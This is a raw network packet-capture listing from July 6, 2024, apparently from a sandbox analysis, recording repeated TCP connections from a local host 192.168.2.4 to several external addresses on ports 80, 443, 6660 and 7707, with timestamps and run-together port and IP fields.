                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.930223942 CEST4991280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.930267096 CEST4991280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.935179949 CEST8049912188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.936156988 CEST4991280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.941355944 CEST8049912188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.656074047 CEST66604991094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.656147957 CEST499106660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.770708084 CEST8049912188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.771107912 CEST8049912188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.771173000 CEST4991280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.776756048 CEST4991280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.878443956 CEST4991380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.883385897 CEST8049913188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.883450031 CEST4991380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.883497000 CEST4991380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.888286114 CEST8049913188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.888343096 CEST4991380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.893156052 CEST8049913188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.615864038 CEST8049913188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.616656065 CEST8049913188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.616699934 CEST4991380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.620747089 CEST4991380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.722261906 CEST4991580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.727194071 CEST8049915188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.727335930 CEST4991580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.727535009 CEST4991580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.732321024 CEST8049915188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.732469082 CEST4991580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.737381935 CEST8049915188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.450159073 CEST8049915188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.450177908 CEST8049915188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.453815937 CEST4991580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.473834991 CEST4991580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.582026958 CEST4991680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.587801933 CEST8049916188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.587907076 CEST4991680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.591739893 CEST4991680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.596585989 CEST8049916188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.596731901 CEST4991680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.601556063 CEST8049916188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.193624020 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.252588034 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.331449032 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.340181112 CEST8049916188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.340306044 CEST8049916188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.340368032 CEST4991680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.344012976 CEST4991680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.380650043 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.456284046 CEST4991780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.461702108 CEST8049917188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.461781979 CEST4991780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.461822987 CEST4991780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.466770887 CEST8049917188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.466818094 CEST4991780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.471662045 CEST8049917188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.185849905 CEST8049917188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.186712980 CEST8049917188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.186758995 CEST4991780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.188843012 CEST4991780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.300014019 CEST4991880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.308953047 CEST8049918188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.309067011 CEST4991880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.309123039 CEST4991880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.318773985 CEST8049918188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.318816900 CEST4991880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.323812962 CEST8049918188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.656095028 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.662972927 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.663032055 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.053399086 CEST8049918188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.054510117 CEST8049918188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.057977915 CEST4991880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.072365046 CEST4991880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.175024033 CEST4991980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.179872036 CEST8049919188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.179945946 CEST4991980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.182972908 CEST4991980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.187757969 CEST8049919188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.188524008 CEST4991980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.193445921 CEST8049919188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.682248116 CEST499106660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.682562113 CEST499206660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.689259052 CEST66604991094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.689850092 CEST66604992094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.689917088 CEST499206660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.690402031 CEST499206660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.697365046 CEST66604992094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.874351025 CEST8049919188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.874602079 CEST8049919188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.874649048 CEST4991980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.877960920 CEST4991980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.987605095 CEST4992180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.992557049 CEST8049921188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.992616892 CEST4992180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.992696047 CEST4992180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.997442961 CEST8049921188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.997484922 CEST4992180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.002274036 CEST8049921188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.805322886 CEST8049921188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.805497885 CEST8049921188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.805655003 CEST4992180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.809093952 CEST4992180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.928060055 CEST4992280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.933006048 CEST8049922188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.933104992 CEST4992280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.933231115 CEST4992280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.938025951 CEST8049922188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.938119888 CEST4992280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.942926884 CEST8049922188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.327136993 CEST66604992094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.327214003 CEST499206660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.450254917 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.455310106 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.455578089 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.460443020 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.650013924 CEST8049922188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.653357983 CEST8049922188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.653428078 CEST4992280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.658185959 CEST4992280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.769184113 CEST4992380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.774107933 CEST8049923188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.774174929 CEST4992380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.774224997 CEST4992380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.779072046 CEST8049923188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.779117107 CEST4992380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.783977032 CEST8049923188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.784224987 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.926456928 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.926512003 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.011379957 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.016191006 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.016241074 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.021007061 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.501929045 CEST8049923188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.502273083 CEST8049923188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.502321005 CEST4992380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.506844044 CEST4992380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.612829924 CEST4992580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.617707968 CEST8049925188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.617773056 CEST4992580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.617854118 CEST4992580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.622631073 CEST8049925188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.622714043 CEST4992580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.629142046 CEST8049925188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.962925911 CEST49926443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.962956905 CEST44349926104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.963061094 CEST49926443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.963352919 CEST49926443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.963363886 CEST44349926104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.306035042 CEST8049925188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.308648109 CEST8049925188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.308846951 CEST4992580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.309221029 CEST4992580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.425643921 CEST4992780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.430823088 CEST8049927188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.431241035 CEST4992780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.431241035 CEST4992780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.436131001 CEST8049927188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.436265945 CEST4992780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.441086054 CEST8049927188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.474972963 CEST44349926104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.475066900 CEST49926443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.476505995 CEST49926443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.476512909 CEST44349926104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.476874113 CEST44349926104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.479063034 CEST49926443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.520515919 CEST44349926104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.607285023 CEST44349926104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.607331038 CEST44349926104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.609945059 CEST49926443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.610946894 CEST49926443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.618398905 CEST4992880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.623318911 CEST8049928208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.623389006 CEST4992880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.623472929 CEST4992880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.628371000 CEST8049928208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.094541073 CEST8049928208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.133712053 CEST8049927188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.134175062 CEST8049927188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.134224892 CEST4992780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.135804892 CEST4992780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.174469948 CEST4992880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.237441063 CEST4992980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.242532969 CEST8049929188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.242595911 CEST4992980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.242660999 CEST4992980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.249264002 CEST8049929188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.249310017 CEST4992980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.255361080 CEST8049929188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.294513941 CEST4992880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.296478033 CEST4993080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.300143003 CEST8049928208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.300194979 CEST4992880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.301508904 CEST8049930208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.301609039 CEST4993080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.301712036 CEST4993080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.306559086 CEST8049930208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.764298916 CEST8049930208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.927062988 CEST4993080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.934247017 CEST8049930208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.934437990 CEST4993080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.944036961 CEST49931443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.944070101 CEST44349931104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.944335938 CEST49931443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.945097923 CEST49931443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.945110083 CEST44349931104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.406649113 CEST44349931104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.410248995 CEST49931443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.410264969 CEST44349931104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.418967962 CEST8049929188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.419195890 CEST8049929188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.419358015 CEST4992980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.421288013 CEST4992980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.532864094 CEST44349931104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.532974958 CEST44349931104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.533878088 CEST49931443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.534153938 CEST49931443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.537842989 CEST4993280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.543520927 CEST8049932188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.543667078 CEST4993280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.543667078 CEST4993280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.548638105 CEST8049932188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.548959017 CEST4993280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.554032087 CEST8049932188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.597589016 CEST4993380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.602463961 CEST8049933208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.606249094 CEST4993380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.606386900 CEST4993380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.611123085 CEST8049933208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.106760025 CEST8049933208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.174469948 CEST4993380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.346447945 CEST499206660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.346688986 CEST499346660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.352461100 CEST66604992094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.352473974 CEST66604993494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.352555037 CEST499346660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.352838993 CEST499346660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.357652903 CEST66604993494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.581022024 CEST4993380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.581640959 CEST4993580192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.586292028 CEST8049933208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.586339951 CEST4993380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.586421967 CEST8049935208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.586487055 CEST4993580192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.586594105 CEST4993580192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.591382027 CEST8049935208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.788850069 CEST8049932188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.789813995 CEST8049932188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.789993048 CEST4993280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.791152954 CEST4993280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.893771887 CEST4993680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.899725914 CEST8049936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.900229931 CEST4993680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.900229931 CEST4993680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.905937910 CEST8049936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.906161070 CEST4993680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.911761045 CEST8049936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.040779114 CEST8049935208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.041086912 CEST4993580192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.041842937 CEST49937443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.041879892 CEST44349937104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.042110920 CEST49937443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.045783043 CEST49937443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.045793056 CEST44349937104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.047914028 CEST8049935208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.048053026 CEST4993580192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.528816938 CEST44349937104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.530215979 CEST49937443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.530234098 CEST44349937104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.621264935 CEST8049936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.622536898 CEST8049936188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.622634888 CEST4993680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.622751951 CEST4993680192.168.2.4188.114.96.3
